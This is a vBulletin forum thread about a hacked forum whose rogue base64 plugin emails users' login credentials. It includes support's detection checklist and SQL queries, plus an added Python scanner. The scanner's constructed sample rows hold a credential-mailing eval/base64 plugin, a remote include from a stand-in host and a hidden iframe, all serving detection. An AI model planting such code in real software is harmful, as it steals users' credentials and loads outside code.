leaked login info

  • mavherzog
    New Member
    • Oct 2003
    • 19

    [Forum] leaked login info

    I have outbound email originating from my vB 4.2.0 forum that contains login info with the following format:

    Code:
    user: hello
    pass: 6110144
    IP:xx.xx.xx.xx
    REFERER:http://xxx.xx/showthread.php?xxxxxx
    date: 8 June, 2012, 10:25 pm

    All these are going to the same address (a gmail address). I created an alias in my mail program to capture several of the emails before bitbucketing them.

    I've searched the database, the templates, and all the static files for the email address and can not find anything. I'm at a loss as to how to find this and kill it.

    Any help would be appreciated!!

    - - - Updated - - -

    Most of them have the user, pass, and REFERER empty, like this:

    Code:
    user:
    pass:
    IP: xx.xx.xx.xx
    REFERER:
    date: 8 June, 2012, 11:10 pm

    No clue how these are generated and how to stop them.

    - - - Updated - - -

    The ones with populated user and password information I have verified have legitimate login info for user accounts. This is BAD!!!!

    Any help would be appreciated!!!
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 74132

    #2
    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru(), gzencode() or iframes. These are also often signs of a hacked site.

    Query for steps 4 and 5:
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%' OR phpcode like '%gzencode%';

    7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%' OR template like '%gzencode%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there.
    Last edited by Riasat; Sat 9 Jun '12, 3:43pm.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment
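The checklist in the reply above boils down to pattern-matching the plugin and template tables for a handful of indicators and then deciding, per hit, whether the match is legitimate. The following Python script is an added example (not code from this thread or from vBulletin) that applies those same indicators to rows of the shape returned by the two SQL queries above. The rows, the regexes, the decoded-payload re-scan and the helper names (scan_code, scan_plugins, scan_templates) are all constructed for illustration; a real run would feed it the result set of the queries instead of the inline samples.

```python
import base64
import re

# Indicators taken from steps 3-7 of the support reply: base64, exec/system/passthru,
# gzencode, iframes, and remote include/require. Regexes are this example's own.
SUSPICIOUS = {
    "base64": re.compile(r"base64_(?:de|en)code\s*\(", re.I),
    "exec": re.compile(r"\b(?:exec|shell_exec|system|passthru|pass_thru|popen)\s*\(", re.I),
    "gzencode": re.compile(r"\bgz(?:encode|inflate|uncompress)\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]?(?:https?|ftp)://", re.I),
}

# A base64 string literal passed straight to base64_decode(); we decode it so the
# hidden payload can be inspected instead of trusting the wrapper.
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

# Templates where the reply says an <iframe> is expected.
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
    "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
    "search_common_select_type",
}


def scan_code(code):
    """Return (hits, decoded_payloads) for one phpcode/template string."""
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(code)]
    decoded = []
    for m in B64_LITERAL.finditer(code):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64, leave the literal alone
            continue
        decoded.append(text)
        # Re-scan the decoded payload: the wrapper hides what actually runs.
        for name, rx in SUSPICIOUS.items():
            tag = "decoded:" + name
            if rx.search(text) and tag not in hits:
                hits.append(tag)
        if re.search(r"\bmail\s*\(", text) and "decoded:mail" not in hits:
            hits.append("decoded:mail")  # outbound mail from a hook is the symptom in this thread
    return hits, decoded


def scan_plugins(rows):
    """rows: (title, phpcode, hookname, product) as returned by the plugin query."""
    flagged = {}
    for title, phpcode, hookname, product in rows:
        hits, _ = scan_code(phpcode)
        if hits:
            flagged[title] = hits
    return flagged


def scan_templates(rows):
    """rows: (styleid, title, template) as returned by the template query."""
    flagged = {}
    for styleid, title, template in rows:
        hits, _ = scan_code(template)
        if "iframe" in hits and title in IFRAME_ALLOWED:
            hits.remove("iframe")  # expected there per the reply's list
        if hits:
            flagged[title] = hits
    return flagged


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample rows (not real data from the thread).
PLUGIN_ROWS = [
    ("Login Helper", "eval(base64_decode('%s'));" % _b64("mail($to, 'login', $u . ':' . $p);"),
     "login_process", "vbulletin"),
    ("Lite Addon Branding", "echo base64_decode('%s');" % _b64("Powered by Example Addon"),
     "global_complete", "example_addon"),
    ("Clean Plugin", "$vbulletin->options['foo'] = 1;", "global_start", "vbulletin"),
    ("Remote Loader", "include_once('http://example.invalid/x.txt');", "global_start", "vbulletin"),
]

TEMPLATE_ROWS = [
    (1, "bbcode_video", '<iframe src="{vb:raw url}"></iframe>'),
    (1, "header", '<div>site</div><iframe src="http://example.invalid/" width="1" height="1"></iframe>'),
    (1, "footer", "<div>footer</div>"),
]

if __name__ == "__main__":
    for name, hits in scan_plugins(PLUGIN_ROWS).items():
        print("plugin  %-20s %s" % (name, ", ".join(hits)))
    for name, hits in scan_templates(TEMPLATE_ROWS).items():
        print("template %-19s %s" % (name, ", ".join(hits)))
```

The point of the decoded re-scan is the judgment call the reply describes: both "Login Helper" and "Lite Addon Branding" trip the base64 indicator, but only the first one evaluates its payload and the payload sends mail from a login hook, which is exactly the symptom reported in this thread, whereas the second decodes to a branding string.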

    • beishe8
      Senior Member
      • Oct 2005
      • 6782
      • 4.2.X

      #3
      Originally posted by mavherzog
      I've searched the database, the templates, and all the static files for the email address and can not find anything. I'm at a loss at to how to find this and kill it.
      It might be another application which does that.


      vB5 is unequivocally the best forum software, but not yet...

      Comment

      • mavherzog
        New Member
        • Oct 2003
        • 19

        #4
        I've got two plugins with base64 code:

        [Screenshot: Screen Shot 2012-06-09 at 6.26.48 AM.jpg]

        When I disable the first one, the emails stop. Should I whack both of these?? (are either of them valid?)

        Comment

        • Zachery
          Former vBulletin Support
          • Jul 2002
          • 59097

          #5
          There are no plugins by default in the vBulletin product.

          Comment

          • wave-rice
            Senior Member
            • Feb 2011
            • 445
            • 5.5.x

            #6
            vBulletin doesn't have any plugins by default, so get rid of them both because they're not meant to be there unless you or another administrator added them.
            Aakif Nazir

            Comment

            • lovecraft22
              Senior Member
              • Feb 2011
              • 147

              #7
              How can this happen? I mean, hashes only should be stored and not plain password…

              Comment

              • Zachery
                Former vBulletin Support
                • Jul 2002
                • 59097

                #8
                vBulletin has an option to disable the md5 hashing before it gets sent to the server, which they might be setting.

                Comment

                • lovecraft22
                  Senior Member
                  • Feb 2011
                  • 147

                  #9
                  Thank you Zachery. Where can I find this option?

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 74132

                    #10
                    Originally posted by lovecraft22
                    How can this happen? I mean, hashes only should be stored and not plain password…
                    If you modify the code, you can capture the plain password as it is typed in. Not really difficult to do. It doesn't happen when you keep your site secure though.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • HolyKiller
                      Senior Member
                      • Dec 2006
                      • 105
                      • 3.6.x

                      #11
                      Check the source code of the first plugin, I think there will be some nasty code inside...

                      Also check admin log to see who added that plugin (Statistics & Logs -> Log Manager)
                      --> If you receive a message like "Control Panel log viewing restricted.", you will need to add your userID in the config.php file to allow access to the logs.

                      Comment
